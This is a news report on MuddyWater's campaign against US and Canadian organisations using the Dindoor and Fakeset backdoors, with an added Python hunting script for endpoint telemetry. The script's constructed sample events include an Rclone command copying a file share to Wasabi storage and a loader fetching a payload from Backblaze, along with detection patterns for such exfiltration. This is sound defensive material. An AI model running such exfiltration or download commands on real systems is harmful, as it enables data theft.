Several US companies have been targeted by Iranian hacking group MuddyWater in a new campaign that started in early February and has continued after the US and Israeli military strikes on Iran.
The campaign was detected by the Threat Hunter Team at Broadcom’s Symantec and Carbon Black.
The potential victims include a US bank, a US airport, non-governmental organizations in both the US and Canada, and the Israeli operation of a US software company that supplies the defense and aerospace sectors. Each of these organizations has experienced suspicious activity on its networks in recent days and weeks, said the Threat Hunter Team in a March 5 report.
The campaign involves a previously unknown backdoor, dubbed ‘Dindoor’ by the cyber threat researchers.
Reused Certificates Tie New Backdoors to Iran-Linked MuddyWater
The Dindoor backdoor was found by the threat researchers on the networks of the Israeli outpost of the software company, the US bank and the Canadian non-profit organization.
Signed with a certificate issued to “Amy Cherne,” this backdoor leverages Deno, the secure runtime for JavaScript and TypeScript, to execute.
The researchers also observed an attempt to exfiltrate data from the software company using Rclone, a command-line program to manage files on cloud storage, to a Wasabi cloud storage bucket. It is not clear if this attempt was successful.
A different backdoor, a Python one called Fakeset, was found on the networks of the US airport. It was signed by certificates issued to “Amy Cherne” and “Donald Gay”.
The Donald Gay certificate has been used previously to sign malware linked to MuddyWater, a hacking group active since 2017 that is also known as Seedworm, Temp Zagros and Static Kitten and is associated with the Iranian Ministry of Intelligence and Security (MOIS).
The backdoor was downloaded from two servers belonging to the Backblaze cloud storage company.
The Donald Gay certificate was also used to sign a sample from the malware family the researchers track as ‘Stagecomp,’ which downloads the Darkcomp backdoor.
The Stagecomp and the Darkcomp malware have been linked to MuddyWater by security vendors, including Google, Microsoft and Kaspersky.
This malware wasn’t seen on the targeted networks, but the use of the same certificates suggests MuddyWater was involved, said the Threat Hunter Team.
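The report's three observable threads, a Deno-hosted backdoor, Rclone transfers to cloud storage, and binaries signed with the reused "Amy Cherne" and "Donald Gay" certificates, can be turned into a simple hunt over endpoint process telemetry. The script below is an added illustration, not code from the Threat Hunter Team's report; the event schema, the provider hostnames and the user-writable-directory heuristic are assumptions, and the sample events are constructed.

```python
import json
import re

# Certificate subject names the report says were reused across the samples.
SUSPECT_SIGNERS = {"amy cherne", "donald gay"}
# Cloud-storage providers the report names as exfiltration / staging hosts.
# The hostnames are assumptions for matching purposes, not taken from the report.
CLOUD_STORAGE = re.compile(r"wasabisys\.com|backblazeb2\.com|backblaze\.com", re.I)
# Directories a legitimate deployment rarely runs scripts from (heuristic assumption).
USER_WRITABLE = re.compile(r"\\(Users\\Public|Temp|AppData|ProgramData)\\", re.I)


def triage_event(event):
    """Return the reasons one process-creation event looks suspicious."""
    image = event.get("image", "").lower()
    cmdline = event.get("cmdline", "")
    reasons = []
    if event.get("signer", "").lower() in SUSPECT_SIGNERS:
        reasons.append(f"signed by reused certificate '{event['signer']}'")
    if image.endswith("rclone.exe") and re.search(r"\b(copy|sync|move)\b", cmdline):
        suffix = " to named cloud provider" if CLOUD_STORAGE.search(cmdline) else ""
        reasons.append("rclone transfer" + suffix)
    if image.endswith("deno.exe") and " run " in f" {cmdline} " and USER_WRITABLE.search(cmdline):
        reasons.append("deno executing a script from a user-writable directory")
    if CLOUD_STORAGE.search(cmdline) and not image.endswith("rclone.exe"):
        reasons.append("command line references named cloud-storage provider")
    return reasons


def triage_log(jsonl):
    """Parse newline-delimited JSON events and return {pid: reasons} for hits only."""
    hits = {}
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        reasons = triage_event(event)
        if reasons:
            hits[event["pid"]] = reasons
    return hits


# Constructed telemetry in a simplified EDR-style schema (not real victim data).
SAMPLE_EVENTS = r"""
{"pid": 4101, "image": "C:\\Users\\Public\\rclone.exe", "signer": "", "cmdline": "rclone.exe copy D:\\Share\\Contracts wasabi:staging --s3-endpoint s3.wasabisys.com"}
{"pid": 4102, "image": "C:\\Users\\Public\\deno.exe", "signer": "Amy Cherne", "cmdline": "deno.exe run -A C:\\Users\\Public\\svc.ts"}
{"pid": 4103, "image": "C:\\ProgramData\\upd\\loader.exe", "signer": "Donald Gay", "cmdline": "loader.exe https://f003.backblazeb2.com/file/bkt/pkg.zip"}
{"pid": 4104, "image": "C:\\Program Files\\Microsoft Office\\EXCEL.EXE", "signer": "Microsoft Corporation", "cmdline": "EXCEL.EXE Q1.xlsx"}
"""

if __name__ == "__main__":
    for pid, reasons in triage_log(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

A benign Rclone listing or a Deno script run from Program Files produces no hit, so the signer match is what carries the weight when the other heuristics are silent.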
“While we have disrupted these breaches, other organizations could still be vulnerable to attack,” the researchers added.
